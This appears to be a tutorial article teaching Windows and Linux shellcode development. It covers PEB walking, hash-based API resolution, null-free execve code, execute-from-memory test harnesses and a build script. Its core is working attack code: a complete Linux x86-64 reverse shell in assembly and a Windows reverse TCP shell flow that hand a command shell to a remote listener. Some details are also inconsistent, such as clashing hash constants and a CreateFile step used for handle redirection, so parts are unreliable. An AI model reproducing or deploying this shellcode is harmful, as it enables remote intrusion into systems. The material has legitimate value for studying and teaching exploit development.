Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.
The Tale of Two Platforms
Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.
Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.
Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.
🔷 Windows Shellcode: The Art of Function Discovery
Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.
The Challenge: No Stable System Calls
Unlike Linux, Windows doesn't provide a stable system call interface. All interactions must go through high-level libraries like kernel32.dll. The core challenge is finding these API functions in memory when ASLR has randomized their locations.
First, let's look at the "correct" way to create a process in C using the CreateProcessA function:
/* ANALYSIS: C-level example of process creation on Windows */
#include <windows.h>
#include <stdio.h>
int main(void) {
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
char commandLine[] = "notepad.exe";
if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0,
NULL, NULL, &si, &pi)) {
printf("CreateProcess failed (%d)\n", GetLastError());
return 1;
}
printf("Process created successfully\n");
// Wait for process to complete
WaitForSingleObject(pi.hProcess, INFINITE);
// Close handles
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.
Part 1: Finding kernel32.dll - The Key to the Kingdom
Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).
The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.
Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:
; find_kernel32.asm (32-bit)
find_kernel32:
xor ecx, ecx ; Zero out ECX
mov eax, [fs:ecx + 0x30] ; EAX = Address of PEB (from TEB at FS:[0x30])
mov eax, [eax + 0x0C] ; EAX = PEB->Ldr
mov eax, [eax + 0x14] ; EAX = PEB->Ldr.InMemoryOrderModuleList.Flink (First entry)
next_module:
mov eax, [eax] ; EAX = Current module's Flink (next module)
mov ebx, [eax + 0x10] ; EBX = Current module's BaseAddress
; In a full implementation, we would hash the module name here to find kernel32.dll
; For simplicity, kernel32.dll is usually the third module loaded.
; So we can just advance twice from the first entry.
mov eax, [eax] ; Move to the second module (ntdll.dll)
mov eax, [eax] ; Move to the third module (kernel32.dll)
mov eax, [eax + 0x10] ; EAX = kernel32.dll BaseAddress
ret
Why it's reliable: The structure of the PEB and TEB is fundamental to how Windows loads processes, making this technique stable across nearly all versions of Windows.
Part 2: Dynamic Function Resolution by Hash
Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:
- Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
- Walk through the DLL's export table
- Hash each name using the same algorithm
- Compare the runtime hash with our pre-calculated target hash
- If they match, retrieve the address of that function
Here is a simple but effective ROR13 hashing algorithm:
; A simple ROR13 hashing function
compute_hash:
xor eax, eax ; Clear EAX to hold the hash
xor edx, edx ; Clear EDX for the character
hash_loop:
mov dl, [esi] ; Get the next character of the function name
test dl, dl ; Check for null terminator
jz hash_finished
ror eax, 13 ; Rotate the hash right by 13 bits
add eax, edx ; Add the character to the hash
inc esi ; Move to the next character
jmp hash_loop
hash_finished:
ret
And here's the logic to find a function given a target hash:
; find_function_by_hash.asm
; Assumes:
; - EBX = Base address of the target DLL
; - EDI = The pre-calculated hash of the function name we want
find_function:
mov eax, [ebx + 0x3C] ; EAX = Offset to PE Header ("PE\0\0")
add eax, ebx ; EAX = Address of PE Header
mov eax, [eax + 0x78] ; EAX = RVA of Export Table
add eax, ebx ; EAX = Address of Export Table
mov esi, [eax + 0x20] ; ESI = RVA of AddressOfNames
add esi, ebx ; ESI = Address of AddressOfNames table
mov edx, [eax + 0x24] ; EDX = RVA of AddressOfNameOrdinals
add edx, ebx ; EDX = Address of AddressOfNameOrdinals table
xor ecx, ecx ; ECX = Loop counter / index
find_loop:
mov edi, [esi + ecx * 4] ; EDI = RVA of current function name
add edi, ebx ; EDI = Address of current function name
; Hash the function name and compare to our target hash
call compute_hash ; Hashes string at EDI, result in EAX
cmp eax, [TARGET_HASH] ; Compare with our target
je found_it
inc ecx
jmp find_loop
found_it:
mov cx, [edx + ecx * 2] ; CX = Ordinal of the function
mov edx, [eax + 0x1C] ; EDX = RVA of AddressOfFunctions
add edx, ebx ; EDX = Address of AddressOfFunctions table
mov eax, [edx + ecx * 4] ; EAX = RVA of the function
add eax, ebx ; EAX = Address of the function
ret
Part 3: Practical Examples
Example 1: MessageBoxA Shellcode
This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.
Execution Flow:
- Find kernel32.dll using a PEB walk
- Find the address of LoadLibraryA within kernel32.dll by hash
- Call LoadLibraryA with the string "user32.dll" to load the library
- The return value from LoadLibraryA is the base address of user32.dll
- Find the address of MessageBoxA within user32.dll by hash
- Push the arguments for MessageBoxA onto the stack
- Call the resolved MessageBoxA address
- Find and call ExitProcess to terminate cleanly
; MessageBoxA Shellcode (Conceptual)
_start:
; --- Find kernel32.dll base ---
call find_kernel32 ; Result: EBX = kernel32.dll base address
; --- Find LoadLibraryA ---
mov eax, 0x0726774C ; Hash of "LoadLibraryA"
call find_function ; Result: EAX = LoadLibraryA address
mov [load_library_addr], eax
; --- Load user32.dll ---
push 0x006c6c64 ; Push "dll\0" (reversed for little-endian)
push 0x2e323375 ; Push ".23u"
push 0x72657375 ; Push "resu" -> "user32.dll"
mov esi, esp ; ESI points to "user32.dll" string
push esi
call [load_library_addr] ; Call LoadLibraryA("user32.dll")
mov ebx, eax ; EBX = user32.dll base address
; --- Find MessageBoxA ---
mov eax, 0x384DA637 ; Hash of "MessageBoxA"
call find_function ; Use user32.dll base in EBX
mov [messagebox_addr], eax ; Store MessageBoxA address
; --- Prepare strings ---
; "Hello World!" message
push 0x00000021 ; Push "!\0\0\0"
push 0x646c726f ; Push "dlro"
push 0x57206f6c ; Push "W ol"
push 0x6c65486f ; Push "lelH" -> "Hello World!"
mov [message_addr], esp
; "Great Binary" title
push 0x00000000 ; Null terminator
push 0x79616e69 ; Push "yani"
push 0x42207461 ; Push "B ta"
push 0x65726757 ; Push "ergr" -> "Great Binary"
mov [title_addr], esp
; --- Call MessageBoxA ---
push 0x00000000 ; uType = MB_OK
push [title_addr] ; lpCaption = "Great Binary"
push [message_addr] ; lpText = "Hello World!"
push 0x00000000 ; hWnd = NULL
call [messagebox_addr] ; Call MessageBoxA
; --- Find and call ExitProcess ---
mov eax, 0x73E2D87E ; Hash of "ExitProcess"
call find_function ; Find ExitProcess in kernel32
push 0x00000000 ; Exit code = 0
call eax ; Call ExitProcess(0)
Example 2: Windows Reverse TCP Shell
This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:
; Windows Reverse Shell (High-level flow)
_start:
; 1. Find kernel32.dll base address via PEB walk
call find_kernel32
mov esi, eax ; Save kernel32 base in ESI
; 2. Find LoadLibraryA in kernel32.dll
mov edi, 0x8E4E0EEC ; Hash of "LoadLibraryA"
call find_function_by_hash
mov [load_library], eax
; 3. Load ws2_32.dll for networking functions
push 0x006c6c64 ; "ll\0"
push 0x642d3233 ; "d-23"
push 0x5f327377 ; "_2sw" -> "ws2_32.dll"
mov eax, esp
push eax
call [load_library]
mov edi, eax ; Save ws2_32 base in EDI
; 4. Resolve networking functions (WSAStartup, WSASocketA, connect)
; ... (function resolution code) ...
; 5. Initialize Winsock
sub esp, 0x190 ; Allocate space for WSADATA
push esp ; lpWSAData
push 0x0202 ; wVersionRequested (2.2)
call [wsa_startup]
; 6. Create socket
push 0x00000000 ; dwFlags
push 0x00000000 ; g
push 0x00000000 ; lpProtocolInfo
push 0x00000006 ; protocol (TCP)
push 0x00000001 ; type (SOCK_STREAM)
push 0x00000002 ; af (AF_INET)
call [wsa_socket]
mov esi, eax ; Save socket in ESI
; 7. Set up sockaddr_in structure
push 0x0100007f ; sin_addr (127.0.0.1 in little endian)
push 0x5c110002 ; sin_port (4444) + sin_family (AF_INET)
mov edi, esp ; EDI points to sockaddr_in
; 8. Connect to attacker
push 0x00000010 ; namelen (sizeof sockaddr_in)
push edi ; name (sockaddr_in)
push esi ; s (socket)
call [connect]
; 9. Redirect STDIN, STDOUT, STDERR to socket
push esi ; hTemplateFile (socket)
push 0x00000000 ; dwFlagsAndAttributes
push 0x00000003 ; dwCreationDisposition (OPEN_EXISTING)
push 0x00000000 ; lpSecurityAttributes
push 0x00000000 ; dwShareMode
push 0x40000000 ; dwDesiredAccess (GENERIC_WRITE)
call [create_file]
; 10. Set up STARTUPINFO for CreateProcessA
; ... (structure setup) ...
; 11. Launch cmd.exe with redirected I/O
push [process_info] ; lpProcessInformation
push [startup_info] ; lpStartupInfo
push 0x00000000 ; lpCurrentDirectory
push 0x00000000 ; lpEnvironment
push 0x00000000 ; dwCreationFlags
push 0x00000001 ; bInheritHandles
push 0x00000000 ; lpThreadAttributes
push 0x00000000 ; lpProcessAttributes
push [cmd_string] ; lpCommandLine ("cmd.exe")
push 0x00000000 ; lpApplicationName
call [create_process]
; 12. Wait for process to exit
push 0xFFFFFFFF ; dwMilliseconds (INFINITE)
push [process_handle] ; hHandle
call [wait_for_single_object]
; 13. Clean up and exit
call [exit_process]
This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.
🔶 Linux Shellcode: The Art of Simplicity
Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.
The Linux Advantage: Direct System Calls
Linux provides a stable system call interface. You don't need to hunt for functions; you can request services directly from the kernel. The fundamental pattern for executing a command in a Linux shell involves three key system calls: fork(), execve(), and waitpid().
This C code demonstrates a rudimentary shell that implements this exact pattern:
/*
ANALYSIS:
LANGUAGE: C
GOAL: A simple shell demonstrating the fork/execve/waitpid pattern.
STATUS: Runnable
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>
#define MAX_COMMAND_LENGTH 1024
#define MAX_ARGS 64
int main(void) {
char command[MAX_COMMAND_LENGTH];
char *args[MAX_ARGS];
pid_t pid;
int status;
while (1) {
printf("$ ");
if (fgets(command, sizeof(command), stdin) == NULL) { break; }
command[strcspn(command, "\n")] = 0; // Remove newline
if (strcmp(command, "exit") == 0) { break; }
// Parse command into arguments
int argc = 0;
char *token = strtok(command, " ");
while (token != NULL && argc < MAX_ARGS - 1) {
args[argc++] = token;
token = strtok(NULL, " ");
}
args[argc] = NULL;
if (argc > 0) {
pid = fork();
if (pid == 0) {
// Child process: execute the command
execvp(args[0], args);
perror("execvp failed");
exit(1);
} else if (pid > 0) {
// Parent process: wait for child
waitpid(pid, &status, 0);
} else {
perror("fork failed");
}
}
}
return 0;
}
From C to execve Shellcode
Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.
Step 1: The C Program
#include <unistd.h>
int main() {
execve("/bin/sh", NULL, NULL);
return 0;
}
Step 2: First Assembly Attempt (with null-byte flaws)
We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.
; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; STATUS: Broken (Contains null bytes)
; GOAL: execve("/bin/sh", NULL, NULL)
section .text
global _start
_start:
; Set up execve system call (BROKEN VERSION)
mov rax, 59 ; execve system call number (contains nulls!)
lea rdi, [rel binsh] ; First argument: pointer to "/bin/sh"
xor rsi, rsi ; Second argument: argv = NULL
xor rdx, rdx ; Third argument: envp = NULL
syscall ; Make the system call
section .data
binsh: db '/bin/sh', 0 ; Null-terminated string (contains null!)
Step 3: The Null-Free Solution
Here's a version that avoids null bytes entirely:
; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; GOAL: A null-free version of execve("/bin/sh", NULL, NULL)
; TECHNIQUES: Stack string construction, register manipulation
section .text
global _start
_start:
; Clear registers without using null bytes
xor rax, rax ; Zero out RAX
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
; Build "/bin/sh" string on the stack
push rdx ; Push null terminator
mov rbx, 0x68732f6e69622f2f ; "/bin//sh" in reverse (little-endian)
push rbx ; Push string onto stack
mov rdi, rsp ; RDI points to our string
; Set up system call number without null bytes
mov al, 59 ; execve system call (only affects lower 8 bits)
; Make the system call
syscall ; Execute /bin/sh
Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, and build the string on the stack instead of using a data section.
Advanced Linux Examples
Linux Reverse Shell
Here's a complete Linux reverse shell that connects back to an attacker:
; Linux Reverse Shell Shellcode
; Connects to 127.0.0.1:4444 and spawns /bin/sh
section .text
global _start
_start:
; Clear registers (also helps avoid null bytes)
xor rax, rax
xor rbx, rbx
xor rcx, rcx
xor rdx, rdx
; Step 1: Create a socket
; socket(AF_INET, SOCK_STREAM, 0)
mov al, 41 ; sys_socket
mov bl, 2 ; AF_INET
mov cl, 1 ; SOCK_STREAM
cdq ; RDX = 0 (protocol)
syscall
mov rdi, rax ; Save socket fd in RDI
; Step 2: Connect to attacker
; connect(sockfd, &addr, sizeof(addr))
; Build sockaddr_in structure on stack
xor rax, rax
push rax ; Padding
; sin_addr = 127.0.0.1 (0x0100007f in little endian)
mov dword [rsp-4], 0x0100007f
; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2)
mov word [rsp-6], 0x5c11 ; Port 4444 in network byte order
mov word [rsp-8], 0x0002 ; AF_INET
sub rsp, 8 ; Adjust stack pointer
mov rsi, rsp ; RSI points to sockaddr_in
mov al, 42 ; sys_connect
mov dl, 16 ; sizeof(sockaddr_in)
syscall
; Step 3: Redirect STDIN, STDOUT, STDERR
; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
mov rbx, rdi ; RBX = socket fd
xor rcx, rcx ; Counter for dup2 loop
dup_loop:
mov al, 33 ; sys_dup2
mov rdi, rbx ; oldfd (socket)
mov rsi, rcx ; newfd (0, 1, 2)
syscall
inc rcx
cmp cl, 3
jl dup_loop
; Step 4: Execute /bin/sh
; execve("/bin/sh", NULL, NULL)
xor rax, rax
push rax ; Null terminator
; Push "/bin/sh" onto stack
mov rbx, 0x68732f6e69622f2f ; "//bin/sh" in reverse
push rbx
mov rdi, rsp ; RDI points to "/bin/sh"
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
mov al, 59 ; sys_execve
syscall
Building and Testing Linux Shellcode
# Build the shellcode
nasm -f elf64 reverse_shell.asm -o reverse_shell.o
ld reverse_shell.o -o reverse_shell
# Extract raw bytes
objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n'
# Create test harness
echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c
Platform Comparison: Key Differences
| Aspect |
Windows |
Linux |
| System Calls |
Unstable, undocumented, use APIs instead |
Stable, documented, direct usage |
| Function Resolution |
PEB walk + hash-based API resolution |
Direct system call numbers |
| Complexity |
High (hundreds of bytes typical) |
Low (dozens of bytes possible) |
| String Handling |
Stack construction + UTF-16 considerations |
Simple stack construction |
| Process Creation |
CreateProcessA with complex structures |
Simple execve system call |
| Networking |
WinSock API (WSASocket, etc.) |
Berkeley sockets (socket, connect, etc.) |
Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.
Testing Your Shellcode
Windows Test Harness
The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.
// windows_harness.c
#include <windows.h>
#include <stdio.h>
// Paste your shellcode bytes here
unsigned char shellcode[] = "\x90\x90\x90...";
int main() {
printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
// Allocate memory with Read, Write, and Execute permissions
void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (exec_mem == NULL) {
printf("VirtualAlloc failed: %lu\n", GetLastError());
return 1;
}
// Copy shellcode to executable memory
memcpy(exec_mem, shellcode, sizeof(shellcode));
printf("Executing shellcode at address: %p\n", exec_mem);
// Execute shellcode
((void (*)())exec_mem)();
// Clean up (this may never be reached)
VirtualFree(exec_mem, 0, MEM_RELEASE);
return 0;
}
Linux Test Harness
// linux_harness.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Your shellcode bytes here
unsigned char shellcode[] = "\x48\x31\xc0\x50...";
int main() {
printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
// Allocate executable memory
void *exec_mem = mmap(NULL, sizeof(shellcode),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (exec_mem == MAP_FAILED) {
perror("mmap failed");
return 1;
}
// Copy shellcode
memcpy(exec_mem, shellcode, sizeof(shellcode));
printf("Executing shellcode...\n");
// Execute
((void (*)())exec_mem)();
// Clean up (may not be reached)
munmap(exec_mem, sizeof(shellcode));
return 0;
}
Cross-Platform Development Script
Here's a Python script that automates testing on both platforms:
#!/usr/bin/env python3
"""
Cross-platform shellcode testing framework
Supports both Windows and Linux shellcode development
"""
import os
import sys
import subprocess
import tempfile
import platform
def create_test_harness(shellcode_bytes, target_os="linux"):
"""Create platform-specific test harness."""
if target_os.lower() == "windows":
template = '''
#include <windows.h>
#include <stdio.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!exec_mem) return 1;
memcpy(exec_mem, shellcode, sizeof(shellcode));
((void (*)())exec_mem)();
VirtualFree(exec_mem, 0, MEM_RELEASE);
return 0;
}}
'''
else: # Linux
template = '''
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
void *exec_mem = mmap(NULL, sizeof(shellcode),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (exec_mem == MAP_FAILED) return 1;
memcpy(exec_mem, shellcode, sizeof(shellcode));
((void (*)())exec_mem)();
munmap(exec_mem, sizeof(shellcode));
return 0;
}}
'''
return template.format(shellcode=shellcode_bytes)
def test_shellcode(binary_path):
"""Extract and test shellcode from binary."""
# Extract bytes using objdump
try:
result = subprocess.run(['objdump', '-d', binary_path],
capture_output=True, text=True)
# Parse objdump output to extract bytes
bytes_list = []
for line in result.stdout.split('\n'):
if ':' in line and '\t' in line:
# Extract hex bytes from objdump format
parts = line.split('\t')
if len(parts) >= 2:
hex_part = parts[1].strip()
# Remove spaces and convert to \x format
hex_bytes = hex_part.replace(' ', '')
for i in range(0, len(hex_bytes), 2):
if i + 1 < len(hex_bytes):
bytes_list.append(f"\\x{hex_bytes[i:i+2]}")
shellcode_string = ''.join(bytes_list)
print(f"Extracted shellcode: {shellcode_string}")
# Create test harness
target_os = "windows" if platform.system() == "Windows" else "linux"
harness_code = create_test_harness(shellcode_string, target_os)
# Write and compile
with tempfile.NamedTemporaryFile(mode='w', suffix='.c', delete=False) as f:
f.write(harness_code)
harness_path = f.name
# Compile
if target_os == "windows":
compile_cmd = ['gcc', '-o', harness_path + '.exe', harness_path]
else:
compile_cmd = ['gcc', '-z', 'execstack', '-o', harness_path + '.out', harness_path]
subprocess.run(compile_cmd, check=True)
print("Test harness compiled successfully!")
return harness_path + ('.exe' if target_os == "windows" else '.out')
except Exception as e:
print(f"Error: {e}")
return None
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 test_shellcode.py <binary_path>")
sys.exit(1)
binary_path = sys.argv[1]
test_executable = test_shellcode(binary_path)
if test_executable:
print(f"Test executable created: {test_executable}")
print("Run it to test your shellcode!")
Advanced Platform-Specific Techniques
Windows Advanced: 64-bit Considerations
64-bit Windows shellcode requires different techniques:
- Different Registers: Use GS:[0x60] instead of FS:[0x30] for PEB access
- Different Calling Convention: Windows x64 uses fastcall (RCX, RDX, R8, R9)
- Shadow Space: Must allocate 32 bytes of shadow space for function calls
- Different Structures: PEB and TEB layouts differ in 64-bit
; 64-bit Windows PEB Walk
find_kernel32_x64:
xor rax, rax
mov rax, [gs:rax + 0x60] ; 64-bit PEB offset
mov rax, [rax + 0x18] ; PEB->Ldr
mov rax, [rax + 0x20] ; InMemoryOrderModuleList
mov rax, [rax] ; First entry
mov rax, [rax] ; Second entry (kernel32)
mov rax, [rax + 0x20] ; DllBase (different offset in 64-bit)
ret
Linux Advanced: System Call Variations
Different Linux architectures use different system call mechanisms:
; x86-64 system calls (modern)
mov rax, 59 ; execve
syscall ; Use syscall instruction
; i386 system calls (legacy)
mov eax, 11 ; execve (different number!)
int 0x80 ; Use interrupt
; ARM system calls
mov r7, #11 ; execve
svc #0 ; Supervisor call
Pro Tip: Always check the target architecture's system call numbers and calling conventions. They can vary significantly between platforms and even versions.
Mastery Achieved: What's Next?
Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:
- ✅ Windows PEB walking and API resolution techniques
- ✅ Linux direct system call methodology
- ✅ Platform-specific function calling conventions
- ✅ Complete working examples for both platforms
- ✅ Professional testing and debugging frameworks
- ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.
Practice Challenges
- Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
- Size Optimization: Create the smallest possible execve shellcode for Linux
- API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
- System Call Tracer: Create Linux shellcode that traces its own system calls
Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.